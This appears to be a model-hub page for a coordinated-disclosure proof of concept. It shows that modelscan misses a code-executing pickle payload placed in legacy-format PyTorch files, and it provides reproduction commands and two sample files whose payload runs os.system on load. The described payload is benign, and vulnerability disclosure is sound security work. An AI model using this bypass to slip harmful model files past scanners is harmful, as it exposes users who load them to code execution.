Benign PoC β€” modelscan legacy-PyTorch scan-truncation bypass

Coordinated-disclosure proof-of-concept for Protect AI modelscan, submitted via huntr (Model File Vulnerability).

modelscan's scan_pytorch scans a legacy (non-zip) PyTorch file with multiple_pickles=False from offset 0, so it disassembles only the first of the file's four concatenated pickles (the MAGIC_NUMBER long, which has no globals) and stops β€” the payload pickle (segment #4) is never inspected. So a malicious legacy .pt/.bin/.pth/.ckpt scans clean yet runs code on torch.load(..., weights_only=False).

Both files below carry the identical benign payload:

  • evil_legacy.pt β€” torch.save(..., _use_new_zipfile_serialization=False) β†’ modelscan: No issues found (the bypass)
  • evil_zip.pt β€” torch.save(..., _use_new_zipfile_serialization=True) β†’ modelscan: CRITICAL posix.system (control)

Reproduce

pip install torch modelscan
modelscan -p evil_legacy.pt    # -> No issues found         (bypass)
modelscan -p evil_zip.pt       # -> CRITICAL posix.system   (same payload, caught in zip format)

The control proves modelscan detects the exact same payload when the format routes it through PickleUnsafeOpScan, but misses it in the legacy format.

Strictly benign: the payload's __reduce__ only runs os.system("echo CELVEX-MFV-MARKER > /tmp/…") β€” it writes a harmless marker string. No weaponization. Confirmed against released modelscan 0.8.8, torch 2.12.1.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support